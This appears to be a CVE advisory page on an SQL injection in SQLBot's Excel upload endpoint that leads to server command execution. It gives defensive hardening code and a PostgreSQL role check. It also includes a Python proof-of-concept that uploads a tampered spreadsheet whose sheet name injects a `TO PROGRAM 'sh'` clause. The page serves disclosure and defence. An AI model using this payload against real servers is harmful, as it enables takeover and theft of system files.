Security Vulnerability Report
CVE-2026-32950 CVSS 8.8 HIGH

CVE-2026-32950

Published: 2026-03-20 05:16:15
Last Modified: 2026-03-23 18:04:31

Description

SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a critical SQL Injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that enables Remote Code Execution (RCE), allowing any authenticated user (even the lowest-privileged) to fully compromise the backend server. The root cause is twofold: Excel Sheet names are concatenated directly into PostgreSQL table names without sanitization (datasource.py#L351), and those table names are embedded into COPY SQL statements via f-strings instead of parameterized queries (datasource.py#L385-L388). An attacker can bypass the 31-character Sheet name limit using a two-stage technique—first uploading a normal file whose data rows contain shell commands, then uploading an XML-tampered file whose Sheet name injects a TO PROGRAM 'sh' clause into the SQL. Confirmed impacts include arbitrary command execution as the postgres user (uid=999), sensitive file exfiltration (e.g., /etc/passwd, /etc/shadow), and complete PostgreSQL database takeover. This issue has been fixed in version 1.7.0.
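The two root causes above (sheet name used verbatim as a table name, table name interpolated into COPY with an f-string) are the whole story, so the fix is in how identifiers are derived and emitted. The block below is an added example, not SQLBot's code: it places the f-string pattern the advisory describes next to a hardened builder that allowlists the derived table name and quotes every identifier. The COPY statement shape, the `ds_` prefix and the function names are assumptions; the hostile sheet name is the one quoted in the advisory.

```python
import re

# Sheet name quoted in the advisory description and PoC; constructed test input only.
HOSTILE_SHEET_NAME = "tablename) TO PROGRAM 'sh' --"

# PostgreSQL silently truncates identifiers longer than 63 bytes (NAMEDATALEN - 1).
# We reject instead of truncating so two different sheets cannot collide on one table.
PG_MAX_IDENTIFIER_LEN = 63
SAFE_IDENTIFIER_RE = re.compile(r"^[a-z_][a-z0-9_]*$")


def build_copy_unsafe(sheet_name: str, columns: list[str]) -> str:
    """The bug class the advisory describes: the sheet name becomes the table
    name and is dropped into COPY through an f-string, so every SQL token in it
    is parsed as SQL. Statement shape is assumed, not SQLBot's. Contrast only."""
    table_name = f"ds_{sheet_name}"
    return f"COPY {table_name} ({', '.join(columns)}) FROM STDIN WITH (FORMAT csv)"


def table_name_from_sheet(sheet_name: str, prefix: str = "ds_") -> str:
    """Map an untrusted sheet name onto an allowlisted identifier.

    Everything outside [a-z0-9_] is replaced, runs of '_' are collapsed, and
    the result must still match SAFE_IDENTIFIER_RE and fit PostgreSQL's
    length limit. Anything else is rejected rather than repaired, and the
    31-character Excel sheet-name limit is never relied on as a control.
    """
    slug = re.sub(r"[^a-z0-9_]", "_", sheet_name.strip().lower())
    slug = re.sub(r"_+", "_", slug).strip("_")
    if not slug:
        raise ValueError(f"sheet name yields no usable identifier: {sheet_name!r}")
    table_name = prefix + slug
    if not SAFE_IDENTIFIER_RE.match(table_name):
        raise ValueError(f"unsafe table name derived from sheet: {sheet_name!r}")
    if len(table_name.encode("utf-8")) > PG_MAX_IDENTIFIER_LEN:
        raise ValueError(f"table name exceeds {PG_MAX_IDENTIFIER_LEN} bytes: {sheet_name!r}")
    return table_name


def quote_identifier(name: str) -> str:
    """Quote a PostgreSQL identifier: wrap in double quotes and double any
    embedded double quote (the same rule psycopg's sql.Identifier applies).
    The allowlist above already makes this unnecessary for table names; it is
    kept as defence in depth and also covers column names from the header row."""
    if "\x00" in name:
        raise ValueError("identifier contains NUL byte")
    return '"' + name.replace('"', '""') + '"'


def build_copy_safe(sheet_name: str, columns: list[str]) -> str:
    """Hardened builder: allowlisted table name plus quoted identifiers.
    Untrusted text can no longer contribute SQL tokens; the worst a hostile
    sheet name can do is yield an odd-looking but harmless table name."""
    table = quote_identifier(table_name_from_sheet(sheet_name))
    cols = ", ".join(quote_identifier(c) for c in columns)
    return f"COPY {table} ({cols}) FROM STDIN WITH (FORMAT csv)"


def is_rejected(sheet_name: str) -> bool:
    """True when the allowlist refuses to derive a table name at all."""
    try:
        table_name_from_sheet(sheet_name)
    except ValueError:
        return False if False else True
    return False


if __name__ == "__main__":
    print("unsafe :", build_copy_unsafe(HOSTILE_SHEET_NAME, ["cmd"]))
    print("safe   :", build_copy_safe(HOSTILE_SHEET_NAME, ["cmd"]))
```

Run stand-alone, the unsafe builder emits a statement in which `TO PROGRAM 'sh' --` sits in SQL position, while the safe builder emits `COPY "ds_tablename_to_program_sh" ("cmd") FROM STDIN WITH (FORMAT csv)`. Two checks belong beside the code change: `COPY ... TO PROGRAM` only runs for a superuser or a member of the `pg_execute_server_program` role, so the application's database role should be neither (`SELECT rolsuper, pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER') FROM pg_roles WHERE rolname = current_user;` is a quick way to confirm), and any remaining f-string that builds SQL from upload-derived values should be found by a grep for `f"COPY` / `f'COPY` in the code base.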

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:sqlbot:*:*:*:*:*:*:*:* - VULNERABLE
SQLBot < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import zipfile
import io

# Target URL
url = 'http://target:port/api/v1/datasource/uploadExcel'

# Create a malicious Excel file by tampering with XML
# The sheet name is injected into a COPY command to execute 'sh'
malicious_sheet_name = "tablename) TO PROGRAM 'sh' --"

# Simulating the creation of a zip file (xlsx) with modified workbook.xml
# In a real exploit, you would unzip an xlsx, modify xl/workbook.xml, and re-zip.
memory_file = io.BytesIO()
with zipfile.ZipFile(memory_file, 'w', zipfile.ZIP_DEFLATED) as zf:
    # Add dummy content (simplified for PoC)
    zf.writestr('xl/workbook.xml', f'<workbook><sheets><sheet name="{malicious_sheet_name}"/></sheets></workbook>')
    zf.writestr('[Content_Types].xml', '<Types />')
memory_file.seek(0)

# Send the malicious file
files = {'file': ('exploit.xlsx', memory_file, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')}
headers = {'Authorization': 'Bearer <low_privilege_token>'}
response = requests.post(url, files=files, headers=headers)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-32950", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:14.553", "lastModified": "2026-03-23T18:04:30.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a critical SQL Injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that enables Remote Code Execution (RCE), allowing any authenticated user (even the lowest-privileged) to fully compromise the backend server. The root cause is twofold: Excel Sheet names are concatenated directly into PostgreSQL table names without sanitization (datasource.py#L351), and those table names are embedded into COPY SQL statements via f-strings instead of parameterized queries (datasource.py#L385-L388). An attacker can bypass the 31-character Sheet name limit using a two-stage technique—first uploading a normal file whose data rows contain shell commands, then uploading an XML-tampered file whose Sheet name injects a TO PROGRAM 'sh' clause into the SQL. Confirmed impacts include arbitrary command execution as the postgres user (uid=999), sensitive file exfiltration (e.g., /etc/passwd, /etc/shadow), and complete PostgreSQL database takeover. This issue has been fixed in version 1.7.0."}, {"lang": "es", "value": "SQLBot es un sistema inteligente de consulta de datos basado en un modelo de lenguaje grande y RAG. Las versiones anteriores a la 1.7.0 contienen una vulnerabilidad crítica de inyección SQL en el endpoint /api/v1/datasource/uploadExcel que permite la ejecución remota de código (RCE), lo que permite a cualquier usuario autenticado (incluso el de menor privilegio) comprometer completamente el servidor backend. La causa raíz es doble: los nombres de las hojas de Excel se concatenan directamente en los nombres de las tablas de PostgreSQL sin sanitización (datasource.py#L351), y esos nombres de tablas se incrustan en las sentencias SQL de COPY a través de f-strings en lugar de consultas parametrizadas (datasource.py#L385-L388). Un atacante puede eludir el límite de 31 caracteres para el nombre de la hoja utilizando una técnica de dos etapas: primero, subiendo un archivo normal cuyas filas de datos contengan comandos de shell, y luego, subiendo un archivo manipulado con XML cuyo nombre de hoja inyecte una cláusula TO PROGRAM 'sh' en el SQL. Los impactos confirmados incluyen la ejecución arbitraria de comandos como el usuario postgres (uid=999), la exfiltración de archivos sensibles (p. ej., /etc /passwd, /etc /shadow) y la toma de control completa de la base de datos de PostgreSQL. Este problema ha sido solucionado en la versión 1.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": " ... (truncated)
```